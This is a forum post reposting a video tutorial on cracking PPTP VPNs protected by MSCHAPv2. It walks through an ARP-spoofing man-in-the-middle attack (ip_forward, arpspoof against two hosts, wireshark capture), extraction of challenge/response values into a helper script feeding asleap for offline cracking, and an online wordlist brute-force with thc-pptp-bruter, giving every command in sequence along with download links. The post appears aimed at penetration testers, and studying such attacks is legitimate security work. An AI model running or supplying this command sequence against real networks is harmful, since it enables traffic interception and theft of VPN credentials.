Jump to content
ilbr22

[Video] Cracking VPNs (asleap and THC-pptp-bruter) // Hackig PPTP VPNs

By ilbr22, in Tutoriale in engleza

Recommended Posts

ilbr22 Newbie

ilbr22

Posted
Posted

Links

Watch on-line: Watch Cracking VPNs (asleap and THC-pptp-bruter) | g0tmi1k Episodes | Blip

Download Video: asleap _ THC-pptp-bruter.mp4

Script (chap2asleap.py): Free Cloud Storage - MediaFire

What is this?

A python script, to automatically generate the arguments for Joshua Wright's 'asleap' program.

This video demostrates an offline (asleap) and online (THC-pptp-bruter) attack on MSCHAP v2 software VPN.

How does this work?

From wireshark (and a Man In The Middle attack), you can get "CHAP Challenge" and "CHAP Response". We can break theses values down:

CHAP Challenge = Auth Challenge (16 bytes)

CHAP Response = Peer Challenge (16 bytes) and Peer Response (24 bytes)

After finding "Auth Challenge and Peer Challenge" we can add these to the username and hash (sha1)the result. This will generate the "Challenge".

Once we have the challenge, we can feed this into the asleap, along with CHAP Challenge.

This script does all the work for you (and more), it just needs the values from wireshark for it to work. As well as having the option for different styles of attack, you can either uses a dictionary/wordlist or use 'Genkeys' to generate a look up file for asleap (which is recommended). Also by using this, you can automatically run asleap with your arguments.

What do I need?

> asleap

> Python

> The script - chap2asleap.py

> Wireshark

> VPN

> THC-pptp-bruter

Software

Name: asleap

Version: 2.2

Home Page: asleap - exploiting cisco leap

Download Link: http://www.willhackforsushi.com/code...asleap-2.2.tgz

Name: THC-pptp-bruter

Version: 0.1.4

Home Page: #!/bin/the hacker's choice - THC

Download Link: http://freeworld.thc.org/download.ph...r-0.1.4.tar.gz

Name: chap2asleap.py

Version: 0.1.1

Home Page: g0tmi1k

Download Link: Free Cloud Storage - MediaFire

How to use chap2asleap.py:

1.) chmod 755 chap2asleap.py

2.) python chap2asleap.py

Commands:

echo 1 > /proc/sys/net/ipv4/ip_forward

arpspoof -i eth1 -t 10.0.0.3 10.0.0.9

arpspoof -i eth1 -t 10.0.0.9 10.0.0.3

wireshark -i eth1 -k

python chap2asleap.py
python chap2asleap.py -u g0tmi1k -c 3fb0e397540e8aa3df5eb08b0053092c -r df7661696051401f7192726630558ac200000000000000003c  4b7c76ae82dd3050006c53d0bc6012db000acba0c5fec600 -x -v

cd /pentest/passwords/wordlists
cat darkc0de.lst | thc-pptp-bruter -u g0tmi1k -n 99 -l 999 10.0.0.3

Notes:

Song: Two Fingers - Keman Rhythm

Video length: 03:03

Capture length: 5:48

Blog Post: http://g0tmi1k.blogspot.com/2010/03/...2asleappy.html

Forum Post: http://www.backtrack-linux.org/forum....html#post7959

source: Cracking VPNs (asleap and THC-pptp-bruter)

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...